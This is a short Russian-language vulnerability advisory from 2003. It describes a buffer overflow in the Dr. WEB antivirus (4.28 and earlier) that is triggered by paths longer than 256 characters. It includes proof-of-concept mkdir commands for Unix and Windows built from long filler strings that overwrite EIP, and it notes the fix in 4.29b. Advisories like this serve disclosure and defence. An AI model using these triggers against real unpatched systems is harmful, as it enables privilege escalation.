Переполнение буфера в Dr. WEB

Дата публикации:
06.03.2003
Всего просмотров:
1116
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Переполнение буфера обнаружено в антивирусе Dr. WEB. Уязвимоcть позволяет пользователю с доступом к серверу получить root привилегии на уязвимой системе.

Путь, длинее 256 символов приведет к переполнению буфера в службе и мониторе Dr. WEB. Уязвимость позволяет перезаписать EIP регистр и выполнить произвольный код с системными привилегиями (windows) и с привилегиями Dr. Web демона (UNIX).

Пример:

set a= AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAA
set b= BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBBBBBB

mkdir /$a
mkdir /$a/$b

или:

SET A = AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA 
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAA
SET B = BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB 
BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB BBBBBBBBBB

mkdir \\?\c:\%A%
mkdir \\?\c:\%B%
Уязвимость обнаружена в Dr Web 4.28 и более ранних версиях и устранена в Dr Web Version 4.29b и выше.

Ссылки: Buffer Overflow Vulnerability in Dr. Web
или введите имя

CAPTCHA